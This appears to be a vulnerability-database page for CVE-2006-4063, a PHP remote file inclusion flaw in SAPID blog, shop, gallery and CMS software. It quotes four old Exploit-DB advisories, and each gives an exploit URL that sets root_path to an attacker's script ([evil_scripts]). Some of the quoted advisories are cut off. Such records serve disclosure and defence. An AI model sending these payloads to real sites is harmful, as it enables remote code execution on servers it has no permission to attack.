CVE-2006-4063
published 2006-08-10CVE-2006-4063: Multiple PHP remote file inclusion vulnerabilities in Csaba Godor SAPID Blog Beta 2 and earlier allow remote attackers to execute arbitrary PHP code via a URL…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.09%
86.1th percentile
Multiple PHP remote file inclusion vulnerabilities in Csaba Godor SAPID Blog Beta 2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) root_path parameter to (a) usr/extensions/get_blog_infochannel.inc.php, (b) usr/extensions/get_blog_meta_info.inc.php, or (c) usr/extensions/get_infochannel.inc.php; or the (2) GLOBALS[root_path] parameter to (d) usr/extensions/get_tree.inc.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| csaba_godor | sapid_blog_beta_2 | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SAPID Blog Beta 2 - 'ROOT_PATH' Remote File Inclusion
exploitdb·2006-08-07
CVE-2006-4063 SAPID Blog Beta 2 - 'ROOT_PATH' Remote File Inclusion
SAPID Blog Beta 2 - 'ROOT_PATH' Remote File Inclusion
---
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$ SAPID Blog <= Beta 2 (root_path) Remote File Include Vulnerability
$$ Script site: http://sapid.sourceforge.net/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: [email protected] or http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$ Adam, DeathSpeed, Drzewko, pepi
$$
$$ Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:
http://www.site.com/[sapidblog_path]/usr/extensions/get_blog_infochannel.inc.php?root_path=[evil_scripts]
http://www.s
Exploit-DB
SAPID Shop 1.2 - 'ROOT_PATH' Remote File Inclusion
exploitdb·2006-08-07
CVE-2006-4063 SAPID Shop 1.2 - 'ROOT_PATH' Remote File Inclusion
SAPID Shop 1.2 - 'ROOT_PATH' Remote File Inclusion
---
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$ SAPID Shop <= v.1.2 (root_path) Remote File Include Vulnerability
$$ Script site: http://sapid.sourceforge.net/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: [email protected] or http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$ Adam, DeathSpeed, Drzewko, pepi
$$
$$ Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:
http://www.site.com/[sapidshop_path]/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[evil_scripts]
#Pozdro dla wszystk
Exploit-DB
SAPID Gallery 1.0 - 'ROOT_PATH' Remote File Inclusion
exploitdb·2006-08-07
CVE-2006-4065 SAPID Gallery 1.0 - 'ROOT_PATH' Remote File Inclusion
SAPID Gallery 1.0 - 'ROOT_PATH' Remote File Inclusion
---
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$ SAPID Gallery <= v.1 (root_path) Remote File Include Vulnerability
$$ Script site: http://sapid.sourceforge.net/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: [email protected] or http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$ Adam, DeathSpeed, Drzewko, pepi
$$
$$ Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:
http://www.site.com/[sapidgalery_path]/usr/extensions/get_calendar.inc.php?root_path=[evil_scripts]
http://www.site.co
Exploit-DB
SAPID 1.2.3.05 - 'ROOT_PATH' Remote File Inclusion
exploitdb·2006-08-07
CVE-2006-4063 SAPID 1.2.3.05 - 'ROOT_PATH' Remote File Inclusion
SAPID 1.2.3.05 - 'ROOT_PATH' Remote File Inclusion
---
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$ SAPID CMS <= v. 1.2.3.05 (root_path) Remote File Include Vulnerability
$$ Script site: http://sapid.sourceforge.net/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: [email protected] or http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$ Adam, DeathSpeed, Drzewko, pepi
$$
$$ Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:
http://www.site.com/[sapidcms_path]/usr/extensions/get_infochannel.inc.php?root_path=[evil_scripts]
http://www.site.c
No writeups or analysis indexed.
2006-08-10
Published